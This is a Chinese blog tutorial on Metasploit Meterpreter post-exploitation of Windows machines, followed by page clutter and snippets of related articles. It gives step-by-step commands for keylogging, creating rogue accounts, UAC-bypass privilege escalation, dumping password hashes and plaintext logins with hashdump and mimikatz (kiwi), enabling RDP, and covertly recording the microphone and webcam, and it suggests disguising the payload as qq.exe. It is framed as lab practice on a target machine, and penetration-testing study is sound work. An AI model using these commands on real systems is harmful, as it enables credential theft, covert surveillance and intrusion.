msf后渗透(Meterpreter命令)

最新推荐文章于 2024-04-18 23:31:53 发布
最新推荐文章于 2024-04-18 23:31:53 发布
阅读量425 收藏 4
点赞数
文章标签: 服务器 linux 运维 网络安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_76986722/article/details/132940551
版权

一.访问文件系统

1.文件交互指令

|

2.Linux权限理解

(如果显示文件权限不够,可执行这个命令)

chmod 777 {文件名.后缀}

chmod 777 shell.elf

二.上传下载文件

三.屏幕截图

四.键盘记录

CR是换行

五.创建账号(Windows)

1、先看下目标靶机已存在用户

meterpreter中输入:run post/windows/gather/enum_logged_on_users

2、使用getgui创建 一个用户名为 msb 密码为 123456 的账户

run getgui -u msb -p 123456

run getgui -u {用户名}-p {密码}

进入win的运行输入netplwiz 可以查看账户创建情况

[-] Insufficient privileges, account was not be created. 看到这个提示就需要先提权(获取到system) getsystem

2.1 绕过UAC提权

use exploit/windows/local/ask

session填刚才那个没有权限的session

filenname,path这两个也可以进行设置,比如名字改成qq.exe,就会qq在提权,更容易上

六.音频设备录制

record_mic 包含4个可选参数 分别为

-d 是设置录音时长的

-f 设置未见路径的

-h 查看帮助的

-p 控制自动播放的

一条简单的录音语句

record_mic -d 10 -p true

实际录制时间只有一半,只有5秒

七.提权

 提权方法(Windows)查看当前获得用户的权限

meterpreter 中输入: getuid

方法一、 meterpreter中输入:getsystem

方法二、使用msf模块提权

要想提权必须是已经拿到meterpreter

然后将当前meterpreter 后台 meterprerer中输入 background

1、 查看可用模块 MSF终端中输入 search bypassuac 查看提权模块

2、 选择一个适合当前系统的提权模块 我这边使用的是win10系统

那我们使用:use exploit/windows/local/bypassuac_windows_store_reg 尝试提权

这个模块不行就换一个 use exploit/windows/local/bypassuac_sluihijack

或者 use exploit/windows/local/bypassuac_dotnet_profiler

3 ,配置模块使用参数 终端内输入: show options

4, 可以看到需要配置 session 终端内输入:set session {需要提权的session id}

5, 执行提权 终端内输入:run

6 ,获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限

7 ,获取权限完成后 输入getuid 即可看到 已经获取到SYSTEM 最高权限了

看到这个证明已经将权限提升成功

八.获取登录密码(Windows)

首先获得一个有SYSTEM权限的meterpreter

1 抓取自动登录账户密码

2 导出SAM数据库本地账户密码文件

3 导出密码哈希

4 使用kiwi模块获取

------------------------------------------------

方法一 :

很多人喜欢给在计算机设置自动登录 我们可以通过抓取自动登录的账户密码

run windows/gather/credentials/windows_autologin

如果提示这证明本机并没有配置自动登录

方法二:

还可以通过导出SAM数据库中的本地用户账号(注意需要提权到SYSTEM)

run post/windows/gather/smart_hashdump

方法三:

使用 hashdump 获取密码(注意需要提权到SYSTEM才能使用)

终端内输入 run hashdump

使用在线解析工具 md5在线解密破解,md5解密加密

NTLM哈希 例子:32ed87bdb5fdc5e9cba88547376818d4

方法四:

使用load kiwi(使用kiwi模块需要system权限)

kiwi_cmd 模块可以让我们使用mimikatz的全部功能, mimikatz 的命令直接在kiwi_cmd里直接使用

1 终端输入 load kiwi

2 creds_all 直接获取密码

3 使用 kiwi_cmd sekurlsa::logonpasswords 获取密码

九.远程监控(Windows)

1 使用rdesktop远程控制  rdesktop安装与使用_fofa的博客-CSDN博客

说明:rdesktop是linux下支持Windows远程桌面连接的客户端程序,在linux系统下可通过它远程访问Windows桌面,支持多种版本。rdesktop是sourceforge下支持GPL协议的一个开源项目,采用RDP(Remote Desktop Protocol,远程桌面协议),几乎可以连接windows的所有版本

rdesktop常用参数

rdesktop -u 用户名 -p 密码 -f IP

rdesktop -u mb -p 123456 -f -g 1024x720 192.168.110...

尽量不要 -f

如果远程计算机没有启动远程功能我们可以在meterpreter中输入

启动远程桌面协议:run post/windows/manage/enable_rdp

2 .通过vnc远程   kali安装vnc_fofa的博客-CSDN博客

十.调用摄像头

一台安卓设备,没有可以使用模拟器

1.实战

靶机获取到meterpreter后我们可以使用 webcam模块实现调用软,硬件摄像头

webcam模块支持命令

1. webcam_list

中文会显示空百

2 .webcam_snap 调用单个软,硬件摄像头拍照

3 .webcam_stream 调用单个软,硬件摄像头直播

Skunk Work
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
metepreter命令
sunshine19871211的博客
04-14 997
https://xz.aliyun.com/t/2536 meterpreter渗透命令 background 将会话切换到后台 sessions -l sessions -i 2 启动一个shell或一个meterpreter sessions -k 2 杀死shell upload /root/桌面/payload.txt c: edit payload.txt cat ls c: ...
msf命令全集
06-05
MSF(Metasploit Framework)是一款功能强大且功能丰富的渗透测试工具,提供了多种命令来实现各种功能。下面是 MSF 命令全集的详细解释: 基本命令 * `?`:帮助菜单,显示所有可用的命令 * `back`:从当前环境返回...
MSF渗透操作
weixin_51583379的博客
11-03 1521
1.文件交互指令Linux权限理解chmod 777 {文件名.后缀}
Metasploit 内网渗透一 ——基础环境配置、渗透过程中遇到的配置问题处理、kali中MSF基础命令
最新发布
天下著书立传者,皆为我师
04-18 415
Metasploitable2-linux:攻击机 192.168.234.8。kali-debian:攻击机 192.168.234.141。修改网卡后,需要重启网卡:service networking restart。win7 虚拟机:靶机 192.168.234.158。注:win7靶机需要关闭防火墙,kali才能ping通。同时还需要配置虚拟机网络。
一次Docker逃逸引起域控权限的丢失
Karka_的博客
09-09 136
整个靶场环境一共五个靶机,分别位于三层网络环境中:网络拓扑如下:DMZ区IP段为192.168.1.0/24第二层网络环境IP段为192.168.52.1/24第三层网络环境IP段为192.168.93.1/24。
渗透攻击命令和模块
Cwillchris的博客
04-12 1329
通过永恒之蓝或其他漏洞初步入侵目标主机后,如何扩大战果,下面给大家罗列了相关命令和模块 一、命令 1、arp 查看内网主机 2、background 将当前的会话转在后台运行。从而进行新的渗透测试。 如果想返回之前的会话,那么就输入“sessions -i 会话ID” 命令 3、clearev 清除系统,软件之类的所有登陆信息 4、download、upload download可以下载目标系统的文件 upload可以上传本机文件到目标系统
【内网安全】——meterpreter使用攻略
Demo不是emo的博客
02-01 5594
meterpreter使用攻略(持续更新中)
Meterpreter命令合集(详细)
2302_76986722的博客
09-16 2072
help# 查看Meterpreter帮助background#返回,把meterpreter后台挂起bgkill# 杀死一个 meterpreter 脚本bglist#提供所有正在运行的后台脚本的列表bgrun#作为一个后台线程运行脚本channel#显示活动频道sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用sesssions -k number #与会话进行交互。
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
Meterpreter 是 Metasploit 框架中的一个高级交互式后渗透工具,它允许渗透测试者在成功利用漏洞后与目标系统进行深度交互,执行多种高级操作。在网络安全和渗透测试领域,Meterpreter 是一种非常重要的工具,因为它...
MSF技术总结
05-07
MSF(Metasploit Framework)是一款功能强大且广泛使用的渗透测试工具,提供了丰富的命令和插件,帮助渗透测试者快速发现和利用系统漏洞。本文将对 MSF 的使用和高级用法进行总结。 一、MSF 架构 MSF 由三个主要...
linux系统安装msf的过程详解
09-14
在Linux系统中安装Metasploit Framework(MSF)是一个重要的步骤,对于网络安全研究者和渗透测试人员来说,这是必备的工具。以下是一个详尽的安装教程,特别针对阿里云Linux系统。 首先,确保你的系统已经更新到...
渗透工具MSF系列培训教程(共17课)10-17课
06-20
第4课:msf用户接口及核心命令 第5课:Exploits模块 第6课:payloads模块 第7课:利用MSF攻击windows 第8课:三个模块作用 第9课:msfcli命令接口 第10课:msfweb命令接口 第11课:msfd命令接口 第12课:msf...
msf提权命令/meterpreter下的几个命令
aiquan9342的博客
04-30 612
废话: 今天本来日学校内网。以为是台08.结果稀里糊涂居然日了宿舍哥们儿的PC机。按道理都该装杀毒的才对,我舍友都不装的。裸装上阵说的就是我舍友了。劝各位大佬。把杀毒装好。补丁打好。 通过这次我也学到了以下几个msf提权相关的命令: 切换到另一个用户界面(该功能基于那些用户已登录)。 screenshot 对目标主机的屏幕进行截图。 upload file...
MSF渗透模块Meterpreter
LainWith的博客
01-27 4265
目录后门persistencemetsvc图形界面getgui信息收集判断目标是不是虚拟机arp主机发现nmap主机发现dumplink-最近访问的文件记录enum_applications-安装的软件收集补丁信息键盘记录抓包浏览器系统口令kiwi内网渗透开启远程桌面添加路由445端口扫描哈希值传递攻击-psexecPortfwd端口转发域信息收集密码喷射令牌窃取痕迹清理 后门 由于 Meterpreter是仅仅驻留在内存中的 Shellcode,一旦目标主机重启,将失去这台机器的控制权,如果管理员将利用的
Metasploit框架(3), meterpreter 常用命令, sniffer流量监听, portfwd端口转发, kiwi, Mimikatz密码破解
探测???
11-29 163
注意: kiwi模块同时支持32位和64位的系统,但是该模块默认是加载32位的系统,所以如果目标主机是64位系统的话,直接默认加载该模块会导致很多功能无法使用。所以如果目标系统是64位的,则必须先查看系统进程列表,然后将meterpreter进程迁移到一个64位程序的进程中,才能加载kiwi并且查看系统明文。
metasploit(MSF渗透超细解说 -- 小黑渗透工具
G_WEB_Xie的博客
05-18 1925
metasploit Framework(msf)里带数千个已知的软件漏洞,并保持持续更新,Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,采用Ruby语言编写。黑掉整个宇宙的称号!!!初心: 记录msfconsole的渗透测试流程,以及每个流程点常用到的一些命令,其中还有一些不足的地方大家可以指出来,我会在本博客中添加补充,也会将大家的名字备注在补充的章节内!!一起加油 ^-^本章出后后续会出实战测试,也会将win和linux常用命令做一期更新。
MSF(六):后渗透
1stPeak's Blog
02-21 5018
渗透测试 安全牛学习Metasploit Framework笔记 一、已经获得目标系统控制权后扩大战果 (1)提权 (2)信息收集 (3)渗透内网 (4)永久后门 二、基于已有session扩大战果 - msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444...
msf之后渗透(笔记)
p_utao的博客
09-14 2435
渗透攻击:信息收集 Metasploit提供了一个强大的后渗透工具——Meterpreter后期渗透模块有200多个。 Meterpreter优势: - 纯内存工作模式,不需要对磁盘进行任何写入操作 - 使用加密通信协议,可以同时与几个信道通信 - 在被攻击进程内工作,不需要创建新的进程 - 易于在多进程之间迁移 - 平台通用 进程迁移 获得shell时,该shell是极其脆弱,所以需要移动这个shell把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作,这样使渗透
MSF渗透攻击
weixin_43749601的博客
03-06 1703
进程迁移 刚获得shell时,该shell是极其脆弱和容易受到攻击的。所以第一步就是要移动这个shell,把它和目标机中的一个稳定的进程绑定在一块。 1.ps命令获取目标机正在运行的进程。 2.getpid获得shell的进程号(PID) 3.通过进程号得知该shell的进程名。 4.输入migrate + 被绑定进程的PID 5.再次输出getpid,发现进程号已经变成需要迁移的进程号,进程迁移成功 系统命令 shell连接稳定之后,开始收集系统信息 1.sysinfo命令查看目标机的系统信息 2.rou
meterpreter命令大全
05-17
Meterpreter是Metasploit框架中的一个强大的后渗透利用载荷,它可以在受害者的系统上执行各种操作,包括文件管理、网络嗅探、远程控制等。以下是一些常用的Meterpreter命令: 1. `sysinfo` - 显示有关目标系统的详细信息,包括操作系统版本、CPU类型等。 2. `ps` - 显示当前运行的进程列表。 3. `ls` - 列出当前目录中的文件和文件夹。 4. `cd` - 更改当前目录。 5. `download` - 从目标系统下载文件。 6. `upload` - 将本地文件上传到目标系统。 7. `execute` - 执行指定的命令。 8. `shell` - 启动一个交互式命令行窗口。 9. `getuid` - 显示当前用户的UID。 10. `getpid` - 显示当前进程的PID。 11. `getprivs` - 显示当前进程所拥有的权限。 12. `rev2self` - 使当前进程的权限回到普通用户。 13. `run` - 运行一个指定的Msf模块。 14. `migrate` - 将Meterpreter会话移植到其他进程中。 15. `portfwd` - 在目标系统上创建一个端口转发。 16. `keyscan_start` - 开始记录键盘击键。 17. `keyscan_dump` - 显示已记录的键盘击键。 18. `keyscan_stop` - 停止记录键盘击键。 以上是一些常用的Meterpreter命令,不过Meterpreter还有很多其他的命令可供使用,可以通过`help`命令来查看完整的命令列表。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值